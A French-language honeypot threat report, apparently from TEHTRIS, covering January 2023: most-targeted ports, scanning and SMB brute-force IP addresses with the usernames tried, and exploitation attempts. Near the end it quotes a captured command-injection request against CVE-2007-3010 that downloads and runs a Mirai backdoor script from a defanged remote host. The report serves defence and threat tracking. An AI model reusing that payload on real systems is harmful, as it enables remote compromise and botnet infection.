Dans ce rapport bimensuel basé sur les activités malveillantes détectées par notre réseau mondial de honeypots, vous trouverez un focus sur les ports et protocoles les plus utilisés par les acteurs de la menace, ainsi que sur les vulnérabilités – anciennes et nouvelles – qui sont continuellement testées par les attaquants.
Principaux ports/protocoles ciblés par les cyberattaquants
Au cours du mois de janvier 2023, sur le réseau mondial de honeypots de TEHTRIS, voici le top 10 des ports et protocoles les plus ciblés :
Port | Pourcentages |
22 | 64.679% |
5060 | 10.669% |
161 | 7.877% |
80 | 4.69% |
53 | 3.711% |
445 | 1.822% |
123 | 1.76% |
1604 | 0.857% |
177 | 0.855% |
3389 | 0.764% |
Ces top 10 sont relativement similaires d’une région du monde à l’autre, à l’exception de quelques divergences. Par exemple, 4070 / UDP et 111/UDP se trouvent dans le classement en Europe et en Asie Pacifique (voir ci-dessous), et 3389 / TCP et plus spécifiquement ciblé en Asie Pacifique Sud.
A propos de 4070 / UDP
En janvier, 257 IP distinctes ont envoyé des requêtes UDP sur le port 4070 des honeypots d’Europe et d’Asie Pacifique de TEHTRIS afin d’identifier des vulnérabilités sur des contrôleurs de porte VertX et Edge. 23% de ces scans provenaient de l’adresse IP chinoise 103.56.61[.]147 (AS 4837 – CHINA UNICOM China169 Backbone), et 15% de l’adresse IP américaine 107.151.182[.]42 (AS 21859 – ZEN-ECN) – toutes deux signalées comme malveillantes dans les bases de données publiques. Cette adresse IP américaine a également scanné pour trouver des versions vulnérables de VMware vCenter Chargeback Manager (CVE-2012-1472 ).
A propos de 111 / UDP
En janvier, 242 adresses IP distinctes ont ciblé le port 111 avec des paquets UDP en Asie Pacifique et en Europe. TEHTRIS NTA identifie ces connexions comme étant des tentatives d’attaques par déni de service (DoS) via Portmapper. Portmapper est un service ONC RPC est utilisé pour tracer d’autres services ONC RPC vers leur numéro de port correspondant. Il peut être détourné pour servir d’amplificateur de trafic et effectuer des attaques par déni de service.
A propos de 3389 / TCP
Dans nos honeypots d’Asie Pacifique Sud, les requêtes TCP sur le port 3389 sont classées dans le top 10 des activités réseau. Plus de 80 % de ces analyses provenaient de l’adresse IP chinoise 47.92.172[.]21 (AS 37963 – Alibaba-CN-Net.), qui n’est pas connue des bases de données publique répertoriant les adresses IP malveillantes.
Dans la plupart des cas, le port 3389 est utilisé pour l’accès au bureau à distance. Il est recommandé d’utiliser un service VPN pour se connecter à votre réseau local, afin de ne pas exposer le port 3389 à Internet.
Adresse IP turque abusant du SMB
Plus de 15% des tentatives d’attaque utilisant le protocole SMB contre nos honeypots européens sont menées par l’adresse IP turque 88.255.215[.]2 (AS 9121 – Turk Telekom). Cette adresse IP n’est pas connue des bases de données publiques sur les IP malveillantes.
L’attaquant tente de se connecter en utilisant les noms d’utilisateur suivants :
Nom d’utilisateur : | Pourcentages |
Administrator | 20.327% |
User | 17.291% |
for | 17.278% |
accounts | 17.276% |
\\ | 17.27% |
admin | 3.194% |
0.739% | |
___VMware_Conv_SA___ | 0.355% |
backup | 0.35% |
SAPServiceDAA | 0.349% |
SAPServiceMPG | 0.349% |
SapServiceMPP | 0.349% |
daaadm | 0.349% |
db2mpt | 0.349% |
db2prt | 0.349% |
mptadm | 0.349% |
prtadm | 0.349% |
test | 0.349% |
testmitas | 0.349% |
sapprtdb | 0.349% |
sapadm | 0.349% |
sapmpt | 0.349% |
SAPServicePRT | 0.348% |
SAPServiceMPT | 0.348% |
trmon | 0.291% |
KlPxeUser | 0.132% |
KlScSvc | 0.132% |
administrator | 0.132% |
Ancienne vulnérabilité dans Alcatel-Lucent OMnixPCX Enterprise
2 adresses IP tchèques ont tenté d’abuser d’une ancienne vulnérabilité RCE dans Alcatel-Lucent OMnixPCX Enterprise connue comme CVE-2007-3010 , avec la requête suivante :
/cgi-bin/masterCGI?ping=nomip&user=;cd${IFS}/tmp;wget${IFS}http[ :]//vzwebsite[.]ir/fuez/potar.sh${IFS}-O-${IFS}>sfs;chmod${IFS}777${IFS}sfs;sh${IFS}sfs${IFS}Alcatel ;
L’URL http[ :]//vzwebsite[.]ir/fuez/potar.sh a été vue pour la dernière fois téléchargeant le Shell script potar.sh le 30 janvier, correspondant au SHA256 2f909d5fc67b754a0fff4eaff653333f3a38f0e7f33adb1d73c1ebd27fe192b6. Ce fichier est connu pour être une porte dérobée Linux du botnet Mirai.
Les adresses IP:
Adresse IP | Pays | AS |
195.133.40[.]81 195.133.40[.]83 | CZ | AS 211252 ( Delis LLC ) |